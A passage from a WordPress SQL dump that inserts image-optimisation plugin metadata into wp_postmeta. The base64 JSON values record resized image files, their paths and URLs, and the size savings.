JpZCI6MTg5N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTg3Mi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODcyLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04NzItODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjIxNzksInRpbWUiOjE0ODM1NTI0NTgsImlkIjoxODk3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODcyLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04NzItNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTg3Mi03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MTk4NSwidGltZSI6MTQ4MzU1MjQ2MSwiaWQiOjE4OTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04NzItMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04NzItMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODcyLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjgxODIsInRpbWUiOjE0ODM1NTI0NjYsImlkIjoxODk3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODcyLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04NzItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTg3Mi0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTUzLCJ0aW1lIjoxNDgzNTUyNDY5LCJpZCI6MTg5N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTg3Mi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODcyLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04NzItMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ1NywidGltZSI6MTQ4MzU1MjQ3MiwiaWQiOjE4OTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04NzItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTg3Mi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODcyLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0ODQsInRpbWUiOjE0ODM1NTI0NzcsImlkIjoxODk3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODcyLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04NzItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTg3Mi01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTMxOSwidGltZSI6MTQ4MzU1MjQ4MSwiaWQiOjE4OTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTg3Mi0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODcyLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04NzItMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjQ2MSwidGltZSI6MTQ4MzU1MjQ4NCwiaWQiOjE4OTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTg3Mi00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODcyLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04NzItNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjcwOSwidGltZSI6MTQ4MzU1MjQ4OCwiaWQiOjE4OTd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29038, 1896, 'wpfc_optimisation_reduction', '22552'); 
INSERT INTO `wp_postmeta` VALUES (29039, 1896, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04NjIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTg2Mi5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTUyNDkyLCJpZCI6IjE4OTYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODYyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04NjItMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTg2Mi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6ODYxLCJ0aW1lIjoxNDgzNTUyNDk2LCJpZCI6MTg5Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTg2Mi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODYyLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04NjItODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjI3ODMsInRpbWUiOjE0ODM1NTI0OTksImlkIjoxODk2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODYyLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04NjItNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTg2Mi03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MjU5MSwidGltZSI6MTQ4MzU1MjUwMywiaWQiOjE4OTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04NjItMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04NjItMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODYyLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjExNDg4LCJ0aW1lIjoxNDgzNTUyNTA3LCJpZCI6MTg5Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTg2Mi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODYyLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04NjItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU3NCwidGltZSI6MTQ4MzU1MjUxMCwiaWQiOjE4OTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04NjItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTg2Mi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODYyLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NzUsInRpbWUiOjE0ODM1NTI1MTMsImlkIjoxODk2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODYyLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04NjItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTg2Mi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTM1LCJ0aW1lIjoxNDgzNTUyNTE3LCJpZCI6MTg5Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTg2Mi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODYyLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04NjItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE3NTcsInRpbWUiOjE0ODM1NTI1MjAsImlkIjoxODk2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04NjItMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTg2Mi0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODYyLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo2MjYsInRpbWUiOjE0ODM1NTI1MjMsImlkIjoxODk2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04NjItNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTg2Mi00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODYyLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo4NjIsInRpbWUiOjE0ODM1NTI1MjcsImlkIjoxODk2fV0='); 
INSERT INTO `wp_postmeta` VALUES (29040, 1895, 'wpfc_optimisation_reduction', '20288'); 
INSERT INTO `wp_postmeta` VALUES (29041, 1895, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MzQuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgzNC5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTUyNTMxLCJpZCI6IjE4OTUifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODM0LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MzQtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgzNC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6ODQzLCJ0aW1lIjoxNDgzNTUyNTM0LCJpZCI6MTg5NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgzNC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODM0LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MzQtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjI2NjQsInRpbWUiOjE0ODM1NTI1MzgsImlkIjoxODk1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODM0LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MzQtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgzNC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MjM0MiwidGltZSI6MTQ4MzU1MjU0MiwiaWQiOjE4OTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MzQtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MzQtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODM0LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjk3NjksInRpbWUiOjE0ODM1NTI1NDYsImlkIjoxODk1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODM0LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MzQtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgzNC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTk5LCJ0aW1lIjoxNDgzNTUyNTQ5LCJpZCI6MTg5NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgzNC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODM0LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MzQtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUxMSwidGltZSI6MTQ4MzU1MjU1MiwiaWQiOjE4OTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MzQtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgzNC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODM0LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1NjIsInRpbWUiOjE0ODM1NTI1NTUsImlkIjoxODk1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODM0LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MzQtNTEweDYwMC5qc